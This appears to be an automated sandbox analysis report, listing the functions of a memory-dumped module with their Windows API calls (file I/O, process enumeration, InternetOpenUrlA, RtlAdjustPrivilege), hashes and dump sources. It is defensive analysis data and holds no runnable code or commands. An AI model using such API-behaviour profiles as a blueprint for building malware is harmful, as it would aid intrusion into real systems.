                                                                                                                                      • Instruction Fuzzy Hash: B121E231549256DADB02CF64CA017AE7B60AF42729F389248D4F88F2D3CB348541CB42
                                                                                                                                      Function 69E85C30 Relevance: 7.6, APIs: 5, Instructions: 68fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E85C57
                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,000002FF,00000000), ref: 69E85C75
                                                                                                                                      • ReadFile.KERNEL32(00000000,?,00000300,?,00000000), ref: 69E85C89
                                                                                                                                      • SetFilePointer.KERNEL32(00000000,?,00000000,00000000), ref: 69E85CB1
                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 69E85CC5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$Pointer$ReadWrite_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 231195935-0
                                                                                                                                      • Opcode ID: 3840acdb388d0b4b4af2a38bb36fb2f0ee5b4976881e78eef7dc56b8417b2c35
                                                                                                                                      • Instruction ID: 9063c0c3f9b19925e31d7a04ce11bcd32748a3c3729c364480b387473287bf25
                                                                                                                                      • Opcode Fuzzy Hash: 3840acdb388d0b4b4af2a38bb36fb2f0ee5b4976881e78eef7dc56b8417b2c35
                                                                                                                                      • Instruction Fuzzy Hash: 36216A71605340ABE311DB19D859FAFBBEDAFC5B00F50452DF559C6181DB709608CBA2
                                                                                                                                      Function 69E9B810 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69EC07F1: __getptd.LIBCMT ref: 69EC07F6
                                                                                                                                      • EnterCriticalSection.KERNEL32(69EF2CB8), ref: 69E9B821
                                                                                                                                      • _rand.LIBCMT ref: 69E9B840
                                                                                                                                        • Part of subcall function 69EC0803: __getptd.LIBCMT ref: 69EC0803
                                                                                                                                      • _rand.LIBCMT ref: 69E9B870
                                                                                                                                      • _rand.LIBCMT ref: 69E9B8A0
                                                                                                                                      • LeaveCriticalSection.KERNEL32(69EF2CB8,69EF69C0,0000000D,69EF69C0,0000000C,69EF69C0,0000000B), ref: 69E9B8C0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _rand$CriticalSection__getptd$EnterLeave
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4188531936-0
                                                                                                                                      • Opcode ID: e5153ebd93a29c748518f6360bb2d47189d18842f93959c93ad2322759da9f09
                                                                                                                                      • Instruction ID: 8a91c901d3b45c9b2939d8cec5778f691ff73ee92fb9ed3117064b882964d1fe
                                                                                                                                      • Opcode Fuzzy Hash: e5153ebd93a29c748518f6360bb2d47189d18842f93959c93ad2322759da9f09
                                                                                                                                      • Instruction Fuzzy Hash: 4D113A7B991191A7C321D36842C0B6AF685CFCDA18B3AA02DD9A9273518B71DC4346B1
                                                                                                                                      Function 69E9CF00 Relevance: 7.6, APIs: 5, Instructions: 55processCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 69E9CF1B
                                                                                                                                      • _memset.LIBCMT ref: 69E9CF4C
                                                                                                                                      • Process32First.KERNEL32 ref: 69E9CF62
                                                                                                                                      • Process32Next.KERNEL32(00000000,00000000), ref: 69E9CF7C
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 69E9CF8C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2526126748-0
                                                                                                                                      • Opcode ID: 4070bb6693e6de7472165d90af95055b20ab91a5019a52b64ca3a6ff1a6ac00a
                                                                                                                                      • Instruction ID: 2866603fe5145c383840d3a985276a6213c6081fa6870f6eb06d96256deb6cb1
                                                                                                                                      • Opcode Fuzzy Hash: 4070bb6693e6de7472165d90af95055b20ab91a5019a52b64ca3a6ff1a6ac00a
                                                                                                                                      • Instruction Fuzzy Hash: 0501A1366142505BEB20EB38D806AEF77D4BFC7314F50492EF969C6280E7749109C6D2
                                                                                                                                      Function 69EB6A00 Relevance: 7.6, APIs: 5, Instructions: 54stringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • lstrlenA.KERNEL32(?,?,?), ref: 69EB6A2C
                                                                                                                                      • _memset.LIBCMT ref: 69EB6A49
                                                                                                                                      • GetWindowTextA.USER32(00000000,00000000,00000100), ref: 69EB6A63
                                                                                                                                      • lstrcmpA.KERNEL32(00000000,?,?,?), ref: 69EB6A75
                                                                                                                                      • SetWindowTextA.USER32(00000000,?), ref: 69EB6A81
                                                                                                                                        • Part of subcall function 69EAF4C1: __CxxThrowException@8.LIBCMT ref: 69EAF4D7
                                                                                                                                        • Part of subcall function 69EAF4C1: __EH_prolog3.LIBCMT ref: 69EAF4E4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4273134663-0
                                                                                                                                      • Opcode ID: b8a57765e808c07a8a788ab19ea0b8371c9762cca128b4b5f05801a1cad53b20
                                                                                                                                      • Instruction ID: ce1e6d3d466d9db343c1069bece23bf0cb05238240e28d93ec3d9c07968efb4d
                                                                                                                                      • Opcode Fuzzy Hash: b8a57765e808c07a8a788ab19ea0b8371c9762cca128b4b5f05801a1cad53b20
                                                                                                                                      • Instruction Fuzzy Hash: F001D6B6900154A7CF01DB64DE84FEF776CEB4A724F208065EA49DB244EA74DE488BA0
                                                                                                                                      Function 69EC6C8B Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __getptd.LIBCMT ref: 69EC6C97
                                                                                                                                        • Part of subcall function 69EC7833: __getptd_noexit.LIBCMT ref: 69EC7836
                                                                                                                                        • Part of subcall function 69EC7833: __amsg_exit.LIBCMT ref: 69EC7843
                                                                                                                                      • __amsg_exit.LIBCMT ref: 69EC6CB7
                                                                                                                                      • __lock.LIBCMT ref: 69EC6CC7
                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 69EC6CE4
                                                                                                                                      • InterlockedIncrement.KERNEL32(06471680), ref: 69EC6D0F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4271482742-0
                                                                                                                                      • Opcode ID: a8e94bcb36c7a66948136db7aa37dc11530df0c4009b5f6aeed25cf415a90e9b
                                                                                                                                      • Instruction ID: 58b3f75288a910a1fb55cdbd33da572cd24d43ad282eb81a618cb7325a094fc8
                                                                                                                                      • Opcode Fuzzy Hash: a8e94bcb36c7a66948136db7aa37dc11530df0c4009b5f6aeed25cf415a90e9b
                                                                                                                                      • Instruction Fuzzy Hash: E9016135D45A66EBDB02DF548705B6E77A0BF01B29F304009E8B467780CB35A981CBD3
                                                                                                                                      Function 69EBEEB4 Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69EC21DE: _doexit.LIBCMT ref: 69EC21EA
                                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 69EBEEC5
                                                                                                                                        • Part of subcall function 69EC7645: TlsGetValue.KERNEL32(?,69EC77D1,?,?,69E822E5,?,00000104,69EDE2A0,?,69E8101E), ref: 69EC764E
                                                                                                                                        • Part of subcall function 69EC7645: __decode_pointer.LIBCMT ref: 69EC7660
                                                                                                                                        • Part of subcall function 69EC7645: TlsSetValue.KERNEL32(00000000,?,69E822E5,?,00000104,69EDE2A0,?,69E8101E), ref: 69EC766F
                                                                                                                                      • ___fls_getvalue@4.LIBCMT ref: 69EBEED0
                                                                                                                                        • Part of subcall function 69EC7625: TlsGetValue.KERNEL32(?,?,69EBEED5,00000000), ref: 69EC7633
                                                                                                                                      • ___fls_setvalue@8.LIBCMT ref: 69EBEEE2
                                                                                                                                        • Part of subcall function 69EC7679: __decode_pointer.LIBCMT ref: 69EC768A
                                                                                                                                      • GetLastError.KERNEL32(00000000,?,00000000), ref: 69EBEEEB
                                                                                                                                      • ExitThread.KERNEL32 ref: 69EBEEF2
                                                                                                                                      • __freefls@4.LIBCMT ref: 69EBEF0E
                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 69EBEF21
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1537469427-0
                                                                                                                                      • Opcode ID: 5110df7ee3630954a1a901ed83f398f9432a7ab67dedc7e49dd854970d4966f8
                                                                                                                                      • Instruction ID: 5a826a782481b3e6ad345762e9be9c97cb098396af0bdb7f21af796ab39ccb5e
                                                                                                                                      • Opcode Fuzzy Hash: 5110df7ee3630954a1a901ed83f398f9432a7ab67dedc7e49dd854970d4966f8
                                                                                                                                      • Instruction Fuzzy Hash: ADE04F3480020ADB9F01A7B48B0946E392D5E1030DF30A068BEB0D2104DB36845185D2
                                                                                                                                      Function 69E90DF0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 227COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E90E85
                                                                                                                                      • _memset.LIBCMT ref: 69E90EA2
                                                                                                                                      • _memset.LIBCMT ref: 69E90EBF
                                                                                                                                        • Part of subcall function 69EAF4C1: __CxxThrowException@8.LIBCMT ref: 69EAF4D7
                                                                                                                                        • Part of subcall function 69EAF4C1: __EH_prolog3.LIBCMT ref: 69EAF4E4
                                                                                                                                        • Part of subcall function 69E90860: _memset.LIBCMT ref: 69E90894
                                                                                                                                        • Part of subcall function 69E90860: __localtime64.LIBCMT ref: 69E908B5
                                                                                                                                        • Part of subcall function 69E90860: _strftime.LIBCMT ref: 69E908D8
                                                                                                                                        • Part of subcall function 69E90860: _printf.LIBCMT ref: 69E908EC
                                                                                                                                        • Part of subcall function 69EB2B31: __EH_prolog3_catch_GS.LIBCMT ref: 69EB2B3B
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$Exception@8H_prolog3H_prolog3_catch_Throw__localtime64_printf_strftime
                                                                                                                                      • String ID: P
                                                                                                                                      • API String ID: 55621095-3110715001
                                                                                                                                      • Opcode ID: 50e6f3dc90d4d99d09a40095af272342219c872869ffe9b2b672e7b3bb6e6c7b
                                                                                                                                      • Instruction ID: 6040967618febef6e2abc9c70af0b1cb64446445726d0216a833e6c4fab6f7b1
                                                                                                                                      • Opcode Fuzzy Hash: 50e6f3dc90d4d99d09a40095af272342219c872869ffe9b2b672e7b3bb6e6c7b
                                                                                                                                      • Instruction Fuzzy Hash: AC91C27510C3819FC720CF54C990A9BB7E9FF8A308F60491EE9A987350E731A94ACF52
                                                                                                                                      Function 69EB3FAC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 184networkCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog3.LIBCMT ref: 69EB3FB3
                                                                                                                                      • UrlUnescapeA.SHLWAPI(?,00000000,?,02000000,00000825,?,?,?,?,?,00000010,69E8FB30,?,00000001,00000001,00000000), ref: 69EB404C
                                                                                                                                      • InternetOpenUrlA.WININET(?,?,?,?,?,00000001), ref: 69EB40C4
                                                                                                                                        • Part of subcall function 69EAF32B: _malloc.LIBCMT ref: 69EAF349
                                                                                                                                        • Part of subcall function 69EB3ED1: __EH_prolog3.LIBCMT ref: 69EB3ED8
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: H_prolog3$InternetOpenUnescape_malloc
                                                                                                                                      • String ID: GET
                                                                                                                                      • API String ID: 2204432607-1805413626
                                                                                                                                      • Opcode ID: 0dc7a4430d76e1ec2434f2c9643b8990f17bfedb784d77cb158ac8cd15f77d0c
                                                                                                                                      • Instruction ID: 5cfe5437d229e566e892b86ff2b2efdf16c9ba0d58171ddf6005654e0264dcb6
                                                                                                                                      • Opcode Fuzzy Hash: 0dc7a4430d76e1ec2434f2c9643b8990f17bfedb784d77cb158ac8cd15f77d0c
                                                                                                                                      • Instruction Fuzzy Hash: B451A775904209ABDF02CFA4CA40ABE7BB5EF14358F30951AF915AF294EF34C905DB61
                                                                                                                                      Function 69EA0E40 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E9D870: _memset.LIBCMT ref: 69E9D8F4
                                                                                                                                        • Part of subcall function 69E9D870: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 69E9D906
                                                                                                                                        • Part of subcall function 69E9D870: Module32First.KERNEL32 ref: 69E9D920
                                                                                                                                        • Part of subcall function 69E9D870: Module32Next.KERNEL32(00000000,?), ref: 69E9D979
                                                                                                                                        • Part of subcall function 69E9D870: CloseHandle.KERNEL32(00000000), ref: 69E9D983
                                                                                                                                        • Part of subcall function 69E9CCF0: RtlAdjustPrivilege.NTDLL ref: 69E9CD1C
